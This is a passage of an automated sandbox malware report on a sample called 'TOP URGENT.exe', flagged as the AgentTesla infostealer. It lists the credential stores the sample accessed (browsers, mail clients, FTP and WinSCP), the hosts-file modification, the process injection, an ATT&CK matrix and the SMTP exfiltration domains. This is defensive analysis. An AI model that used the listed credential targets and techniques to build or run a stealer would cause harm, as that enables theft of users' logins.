                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\TOP URGENT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\TOP URGENT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Modifies the hosts file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File written: C:\Windows\System32\drivers\etc\hosts

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: Yara match File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.TOP URGENT.exe.3e4d7b0.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.TOP URGENT.exe.3f5dfd0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.TOP URGENT.exe.3e4d7b0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.493480561.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: TOP URGENT.exe PID: 6352, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6592, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: Yara match File source: 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6592, type: MEMORYSTR

                      Remote Access Functionality:

                      Yara detected AgentTesla
                      Source: Yara match File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.TOP URGENT.exe.3e4d7b0.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.TOP URGENT.exe.3f5dfd0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.TOP URGENT.exe.3e4d7b0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.493480561.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: TOP URGENT.exe PID: 6352, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6592, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
                      | Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Process Injection 212 | File and Directory Permissions Modification 1 | OS Credential Dumping 2 | System Information Discovery 114 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
                      | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | Input Capture 1 | Query Registry 1 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
                      | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Credentials in Registry 1 | Security Software Discovery 221 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
                      | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture 1 | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud |
                      | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 13 | LSA Secrets | Virtualization/Sandbox Evasion 141 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
                      | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Application Window Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
                      | External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 141 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
                      | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 212 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      | Source | Detection | Scanner | Label | Link |
                      | TOP URGENT.exe | 16% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeKeylogger | |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      | Source | Detection | Scanner | Label | Link |
                      | 4.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8 | |

                      Domains

                      No Antivirus matches

                      URLs


                      Domains and IPs

                      Contacted Domains

                      | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                      | us2.smtp.mailhostbox.com | 208.91.199.225 | true | false | | high |
                      | smtp.almuntakhaba.com | unknown | unknown | true | | unknown |

                          URLs from Memory and Binaries

                      | Name | Source | Malicious | Antivirus Detection | Reputation |
                          http://127.0.0.1:HTTP/1.1MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.apache.org/licenses/LICENSE-2.0TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                            high
                            http://www.fontbureau.comTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designersGTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                high
                                http://DynDns.comDynDNSMSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/?TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://us2.smtp.mailhostbox.comMSBuild.exe, 00000004.00000002.503753112.0000000002CF5000.00000004.00000001.sdmpfalse
                                    high
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haMSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers?TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                      high
                                      http://smtp.almuntakhaba.comMSBuild.exe, 00000004.00000002.503753112.0000000002CF5000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.tiro.comTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://bEdYOo.comMSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designersTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.goodfont.co.krTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.carterandcone.comlTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sajatypeworks.comTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.typography.netDTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cn/cTheTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://fontfabrik.comTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cnTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                            high
                                            http://q77LAYiewN5yqbw.netMSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, MSBuild.exe, 00000004.00000002.503782526.0000000002D02000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/DPleaseTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers8TOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                              high
                                              https://api.ipify.org%GETMozilla/5.0MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              low
                                              http://www.fonts.comTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.sandoll.co.krTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.urwpp.deDPleaseTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.zhongyicts.com.cnTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.sakkal.comTOP URGENT.exe, 00000000.00000002.248442189.0000000006EC2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.ipify.org%MSBuild.exe, 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                low
                                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipTOP URGENT.exe, 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp, MSBuild.exe, 00000004.00000002.493480561.0000000000402000.00000040.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown

                                                Contacted IPs


                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.91.199.225 | us2.smtp.mailhostbox.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false

                                                General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 483922
Start date: 15.09.2021
Start time: 16:20:28
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 54s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: TOP URGENT.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.spre.troj.adwa.spyw.evad.winEXE@3/2@2/1
EGA Information: Failed
HDC Information: Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 101
                                                • Number of non-executed functions: 26
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Not all processes were analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/483922/sample/TOP URGENT.exe

                                                Simulations

                                                Behavior and APIs

Time | Type | Description
16:21:33 | API Interceptor | 1x Sleep call for process: TOP URGENT.exe modified
16:21:50 | API Interceptor | 675x Sleep call for process: MSBuild.exe modified

                                                Joe Sandbox View / Context

                                                IPs


                                                                                        Domains


                                                                                        ASN


                                                                                        JA3 Fingerprints


                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TOP URGENT.exe.log
                                                                                        Process:C:\Users\user\Desktop\TOP URGENT.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1216
                                                                                        Entropy (8bit):5.355304211458859
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                        Malicious:true
                                                                                        Reputation:high, very likely benign file
